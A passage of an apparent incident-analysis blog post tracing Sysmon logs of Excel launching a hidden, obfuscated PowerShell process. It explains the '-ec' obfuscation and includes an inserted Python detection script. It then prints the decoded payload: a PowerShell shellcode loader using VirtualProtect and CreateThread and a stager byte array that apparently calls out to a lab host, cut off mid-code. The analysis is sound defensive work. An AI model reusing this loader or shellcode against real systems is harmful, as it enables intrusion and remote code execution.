no-common-ligatures;">FileVersion: 16.0.11929.20838</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Description: Microsoft Excel</span></p><p class="p1" 
style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Product: Microsoft Office</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Company: Microsoft Corporation</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">OriginalFileName: Excel.exe</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">CommandLine: "C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE"<span class="Apple-converted-space"> </span></font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">CurrentDirectory: C:\Windows\system32\</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; 
line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">User: 1011LABS\dave.hull</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">LogonGuid: {fc3f293c-4e60-5f14-ee7e-3b0000000000}</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">LogonId: 0x3B7EEE</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">TerminalSessionId: 1</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">IntegrityLevel: High</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#f4f4f4">Hashes: </font><font 
color="#04ff00">MD5=B0560334F0AFC1EEB1C1F67FD27ED79E,SHA256=477D98352D14E8A65C79A4A68112EBB92E03358708E7B04E9411831A2F0EA5E8,IMPHASH=9AE6B99DE4CEC4B19FFAFF4B2AA4C4E4</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">ParentProcessGuid: {fc3f293c-4e61-5f14-3d9a-3b0000000000}</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">ParentProcessId: 2344</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">ParentImage: C:\Windows\explorer.exe</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">ParentCommandLine: C:\Windows\Explorer.EXE</font></span></p></div><div><br /></div><div>Above, Sysmon has logged an Event ID 1, or process creation event, for the Excel process. We get the creation time, hostname, user context, parent process ID and name, and GUIDs for this process and its parent. 
These globally unique identifiers are generated by Sysmon to make tracking parent and child process relationships easier, since process IDs alone can make this difficult due to the reuse of process IDs. There are a few other useful things here as well: hashes of the process image, and the imphash, a hash of the process's import table.</div><div><br /></div><div>So far, nothing unusual to see here. Next up, things take a turn.</div><h2 style="text-align: left;">A PowerShell Excursion:</h2><div><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Log Name:<span class="Apple-converted-space"> </span>Microsoft-Windows-Sysmon/Operational</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Source:<span class="Apple-converted-space"> </span>Microsoft-Windows-Sysmon</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Date:<span class="Apple-converted-space"> </span>7/19/2020 8:03:34 PM</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Event ID:<span class="Apple-converted-space"> 
</span>1</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Task Category: Process Create (rule: ProcessCreate)</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Level: <span class="Apple-converted-space"> </span>Information</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Keywords: <span class="Apple-converted-space"> </span></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">User:<span class="Apple-converted-space"> </span>SYSTEM</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Computer:<span class="Apple-converted-space"> </span>wins2012r202.1011Labs.com</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; 
font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Description:</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Process Create:</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">RuleName: -</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">UtcTime: 2020-07-19 20:03:34.614</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">ProcessGuid: {fc3f293c-a716-5f14-06ce-430000000000}</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">ProcessId: 1604</font></span></p><p class="p1" 
style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">FileVersion: 10.0.14409.1005 (rs1_srvoob.161208-1155)</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Description: Windows PowerShell</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Product: Microsoft® Windows® Operating System</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Company: Microsoft Corporation</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; 
line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">CommandLine: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe<span class="Apple-converted-space"> </span>/w 1 /C "sv BvI -;sv AT ec;sv Al ((gv BvI).value.toString()+(gv AT).value.toString());powershell (gv Al).value.toString() ('[base64 blob elided]')"</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">CurrentDirectory: C:\Users\davehull\Documents\</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">User: 1011LABS\dave.hull</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">LogonGuid: {fc3f293c-4e60-5f14-ee7e-3b0000000000}</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; 
font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">LogonId: 0x3B7EEE</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">TerminalSessionId: 1</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">IntegrityLevel: High</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Hashes: MD5=38FD25D3D4AD1C28F741B1D4D50B2E6E,SHA256=2C2F1A21D85504374679D83D1BE9553D082AD9B28CBB847A90F04305A09882B9,IMPHASH=A4D32F1AEF525B8ADA6A26F28596AC2E</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">ParentProcessGuid: {fc3f293c-a6fb-5f14-437f-430000000000}</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" 
style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">ParentProcessId: 2476</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">ParentImage: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><font color="#04ff00"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"></span></font></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">ParentCommandLine: "C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE"</font></span></p><div><br /></div><div>Above we have Sysmon logging a process creation event for a PowerShell process. Note this process is a child of the previous Excel process. We can confirm this by looking at the parent process GUID and matching it against the process GUID from the previous process creation event. You could compare the parent process Ids, but again, this is not always foolproof given process Id reuse.</div><div><br /></div><div>As an aside here, many may assume Excel parenting PowerShell is immediately suspect, but in some enterprises, there may be legitimate Excel macros that spawn PowerShell or cmd.exe processes to execute some additional supporting process. 
You may think it ridiculous, but there are <a href="http://www.cosonok.com/2018/09/using-excel-and-vba-to-nslookup-and.html" target="_blank">examples of this to be found</a>.</div><div><br /></div><div>The tell that something is awry with this instance of PowerShell is found on the command-line. No, not the base64 blob, which is also commonly used benignly to protect binary data sent via protocols that can only handle ASCII or to protect formatting. Here's the part that gives it away, for me:</div><div><br /></div><div><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font size="2">CommandLine: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe<span class="Apple-converted-space"> </span>/w 1 /C "sv BvI -;sv AT ec;sv Al ((gv BvI).value.toString()+(gv AT).value.toString());powershell (gv Al).value.toString()</font></span></p></div><div><br /></div><div>What's going on here is clear obfuscation -- someone is trying to evade detection. Let's break this down a bit. 
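Before the line-by-line breakdown, here is how the two checks made so far, parent linkage by ProcessGuid rather than PID and the command-line tell, can be scripted against process-creation records. This is an added example in Python, not code from the post: the Sysmon records, GUIDs and helper names are constructed to mirror the post's fields, and the base64 blob is a constructed stand-in that decodes to a harmless Write-Host rather than the post's real payload.

```python
import base64
import re

# Constructed stand-in for the base64 blob on the post's command line: base64 of
# UTF-16LE text, which is what -EncodedCommand expects. Not the post's real blob.
SAMPLE_SCRIPT = "Write-Host 'constructed sample'"
ENCODED = base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode("ascii")

# Constructed GUIDs and Event ID 1 records, using the field names from the post.
EXCEL_GUID = "{00000000-aaaa-0000-0000-000000000001}"
PS_GUID = "{00000000-bbbb-0000-0000-000000000002}"
DECOY_GUID = "{00000000-cccc-0000-0000-000000000003}"
SAMPLE_EVENTS = [
    {"ProcessGuid": EXCEL_GUID, "ProcessId": "2476",
     "Image": r"C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE",
     "CommandLine": r'"C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE"',
     "ParentProcessGuid": "{00000000-aaaa-0000-0000-000000000000}",
     "ParentProcessId": "1200"},
    {"ProcessGuid": PS_GUID, "ProcessId": "5120",
     "Image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": (r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /w 1 /C "
                     '"sv BvI -;sv AT ec;sv Al ((gv BvI).value.toString()+'
                     '(gv AT).value.toString());powershell (gv Al).value.toString() '
                     + ENCODED),
     "ParentProcessGuid": EXCEL_GUID, "ParentProcessId": "2476"},
    # PID-reuse decoy: parent PID 2476 again, but an earlier, unrelated process
    # held that PID, so the ParentProcessGuid is not the Excel GUID.
    {"ProcessGuid": DECOY_GUID, "ProcessId": "6000",
     "Image": r"C:\Windows\System32\notepad.exe", "CommandLine": "notepad.exe",
     "ParentProcessGuid": "{00000000-dddd-0000-0000-000000000009}",
     "ParentProcessId": "2476"},
]
OFFICE_IMAGES = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")


def index_by_guid(events):
    return {e["ProcessGuid"]: e for e in events}


def parent_by_guid(events):
    """Child GUID -> parent GUID, only where the parent's own event is present."""
    guids = {e["ProcessGuid"] for e in events}
    return {e["ProcessGuid"]: e["ParentProcessGuid"]
            for e in events if e["ParentProcessGuid"] in guids}


def parent_by_pid(events):
    """Naive PID linking, kept only to show how PID reuse mis-attributes."""
    first_with_pid = {}
    for e in events:
        first_with_pid.setdefault(e["ProcessId"], e["ProcessGuid"])
    return {e["ProcessGuid"]: first_with_pid[e["ParentProcessId"]]
            for e in events if e["ParentProcessId"] in first_with_pid}


def decode_encoded_command(token):
    """Decode a -EncodedCommand value (base64 of UTF-16LE); None if it is not one."""
    try:
        text = base64.b64decode(token, validate=True).decode("utf-16-le")
    except ValueError:  # bad alphabet or padding, odd length, invalid UTF-16
        return None
    if text and all(c.isprintable() or c in "\r\n\t" for c in text):
        return text
    return None


def _args_after_image(cmd):
    """Drop the leading executable token so its path does not trip the checks."""
    if cmd.startswith('"'):
        end = cmd.find('"', 1)
        return cmd[end + 1:] if end != -1 else ""
    parts = cmd.split(None, 1)
    return parts[1] if len(parts) > 1 else ""


def triage(event, by_guid):
    """Flags for one record; the parent is looked up by GUID, never by PID."""
    args = _args_after_image(event["CommandLine"])
    parent = by_guid.get(event["ParentProcessGuid"])
    parent_image = (parent["Image"] if parent else "").rsplit("\\", 1)[-1].lower()
    decoded = None
    for m in B64_TOKEN.finditer(args):
        decoded = decode_encoded_command(m.group(0))
        if decoded:
            break
    return {
        "office_parent": parent_image in OFFICE_IMAGES,
        "hidden_window": bool(re.search(r"[/-]w(?:indowstyle)?\s+(?:1|hidden)\b", args, re.I)),
        # 'powershell' again in the arguments: PowerShell launching PowerShell
        "nested_powershell": bool(re.search(r"(?<![\w\\])powershell(?:\.exe)?\b", args, re.I)),
        # sv/gv (Set-Variable/Get-Variable) used to assemble an argument piecemeal
        "alias_chain": bool(re.search(r"\bsv\s+\S+.*\bgv\b", args, re.I)),
        "encoded_command": decoded,
    }


if __name__ == "__main__":
    by_guid = index_by_guid(SAMPLE_EVENTS)
    lineage = parent_by_guid(SAMPLE_EVENTS)
    for e in SAMPLE_EVENTS:
        print(e["ProcessGuid"], "parent:", lineage.get(e["ProcessGuid"]), triage(e, by_guid))
```

Running it shows the decoy attached to Excel only under PID matching, while GUID matching leaves it unlinked, and the PowerShell record lights up every flag with the stand-in blob decoded.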
</div><div><span style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-variant-ligatures: no-common-ligatures;"><br /></span></div><div><span style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-variant-ligatures: no-common-ligatures;"><font size="2">/w 1</font></span> sets the window style to hidden, preventing the PowerShell window from popping up on the user's screen.</div><div><br /></div><div><span style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-variant-ligatures: no-common-ligatures;"><font size="2">"sv BvI -;sv AT ec;sv Al ((gv BvI).value.toString()+(gv AT).value.toString());powershell (gv Al).value.toString()</font></span></div><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><font size="2"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"></span></font></p><div style="color: black; font-family: times; font-variant-ligatures: normal;"></div><p></p><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="color: black; font-family: times; font-size: medium;">This is where things get really suspect. In the line above, the alias for </span><font face="courier" style="color: black; font-size: medium;">Set-Variable, sv,</font><font face="inherit"> is used to create a variable called </font><font face="courier">BvI</font><font face="inherit"> whose value is set to the hyphen character. 
Next, another variable, </font><font face="courier">AT</font><font face="inherit">, is created with a value of ec. A third variable, </font><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="courier">Al</font><font face="inherit">, is then set to the concatenation of the two previous values, giving -ec, short for -EncodedCommand. Finally that variable is passed as an argument to another PowerShell instance, followed by the base64-encoded command.</font></span></div></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit">What of the encoded command? 
If you run it through <a href="https://gchq.github.io/CyberChef/#recipe=From_Base64('A-Za-z0-9%2B/%3D',true)Decode_text('UTF-16LE%20(1200)')&input=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" target="_blank">GCHQ's extremely useful Cyberchef</a>, you'll get this:</font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; widows: 2;"><span style="background-color: #eeeeee; font-variant-ligatures: no-common-ligatures;"><font face="courier">$is='$Ku=''[DllImport(("msvcrt"+"."+"dll"))]public static extern IntPtr calloc(uint dwSize, uint amount);[DllImport("kernel32"+"."+"dll")]public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);[DllImport("kernel32"+"."+"dll")]public static extern IntPtr VirtualProtect(IntPtr lpStartAddress, uint dwSize, uint flNewProtect, out uint Tao);[DllImport("msvcrt"+"."+"dll")]public static extern IntPtr memset(IntPtr dest, uint src, uint 
count);'';$TW="}e8,}82,}00,}00,}00,}60,}89,}e5,}31,}c0,}64,}8b,}50,}30,}8b,}52,}0c,}8b,}52,}14,}8b,}72,}28,}0f,}b7,}4a,}26,}31,}ff,}ac,}3c,}61,}7c,}02,}2c,}20,}c1,}cf,}0d,}01,}c7,}e2,}f2,}52,}57,}8b,}52,}10,}8b,}4a,}3c,}8b,}4c,}11,}78,}e3,}48,}01,}d1,}51,}8b,}59,}20,}01,}d3,}8b,}49,}18,}e3,}3a,}49,}8b,}34,}8b,}01,}d6,}31,}ff,}ac,}c1,}cf,}0d,}01,}c7,}38,}e0,}75,}f6,}03,}7d,}f8,}3b,}7d,}24,}75,}e4,}58,}8b,}58,}24,}01,}d3,}66,}8b,}0c,}4b,}8b,}58,}1c,}01,}d3,}8b,}04,}8b,}01,}d0,}89,}44,}24,}24,}5b,}5b,}61,}59,}5a,}51,}ff,}e0,}5f,}5f,}5a,}8b,}12,}eb,}8d,}5d,}68,}6e,}65,}74,}00,}68,}77,}69,}6e,}69,}54,}68,}4c,}77,}26,}07,}ff,}d5,}31,}db,}53,}53,}53,}53,}53,}68,}3a,}56,}79,}a7,}ff,}d5,}53,}53,}6a,}03,}53,}53,}6a,}50,}e8,}84,}00,}00,}00,}2f,}38,}4b,}68,}38,}39,}00,}50,}68,}57,}89,}9f,}c6,}ff,}d5,}89,}c6,}53,}68,}00,}02,}60,}84,}53,}53,}53,}57,}53,}56,}68,}eb,}55,}2e,}3b,}ff,}d5,}96,}6a,}0a,}5f,}53,}53,}53,}53,}56,}68,}2d,}06,}18,}7b,}ff,}d5,}85,}c0,}75,}16,}68,}88,}13,}00,}00,}68,}44,}f0,}35,}e0,}ff,}d5,}4f,}75,}e1,}68,}f0,}b5,}a2,}56,}ff,}d5,}6a,}40,}68,}00,}10,}00,}00,}68,}00,}00,}40,}00,}53,}68,}58,}a4,}53,}e5,}ff,}d5,}93,}53,}53,}89,}e7,}57,}68,}00,}20,}00,}00,}53,}56,}68,}12,}96,}89,}e2,}ff,}d5,}85,}c0,}74,}cd,}8b,}07,}01,}c3,}85,}c0,}75,}e5,}58,}c3,}5f,}e8,}7d,}ff,}ff,}ff,}31,}30,}2e,}34,}37,}2e,}34,}37,}2e,}32,}36,}00";$Zu=Add-Type -pass -m $Ku -Name "UV" -names wXr;$Zu=$Zu.replace("wXr", "Wi"+"n"+"32Functions");[byte[]]$TW = $TW.replace("}","QhEax").replace("QhEa", "0").Split(",");$RN=0x1007;if ($TW.L -gt 0x1007){$RN=$TW.L};$dV=$Zu::calloc(0x1007, 1);[UInt64]$Tao = 0;for($vX=0;$vX -le($TW.Length-1);$vX++){$Zu::memset([IntPtr]($dV.ToInt32()+$vX), $TW[$vX], 1)};$Zu::VirtualProtect($dV, 0x1007, 0x40, 